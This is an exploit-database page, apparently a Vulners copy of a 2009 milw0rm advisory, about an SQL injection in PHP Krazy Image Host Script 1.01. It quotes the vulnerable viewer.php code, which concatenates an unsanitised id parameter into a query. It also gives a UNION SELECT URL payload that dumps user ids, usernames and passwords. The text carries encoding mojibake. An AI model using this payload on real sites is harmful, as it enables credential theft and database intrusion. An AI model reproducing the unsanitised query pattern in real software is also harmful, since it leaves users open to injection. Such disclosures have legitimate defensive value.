Lucene search

K

PHP Krazy Image Host Script 1.01 - id SQL Injection

๐Ÿ—“๏ธย 12 Feb 2009ย 00:00:00Reported byย x0rTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 7ย Views

PHP Krazy Image Host Script 1.01 SQL Injectio

Show more
Code
#########################################################################################
[0x01] Informations:

Name           : PHP Krazy Image Host Script 1.01
Download       : http://www.hotscripts.com/listings/jump/download/66961/
Vulnerability  : Sql Injection
Author         : x0r
Contact        : [email protected]
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/viewer.php

[Code]
	 	$id = $_GET['id']; [...]
$query="SELECT * FROM images WHERE id=" . $id;
$result = mysql_query($query);
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: http://victim.it/viewer.php?id=-1 union select
0,0,0,concat(id,char(45),user,char(45),password),0,0, from users--

########################################################################################

# milw0rm.com [2009-02-12]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Feb 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
7
.json
Report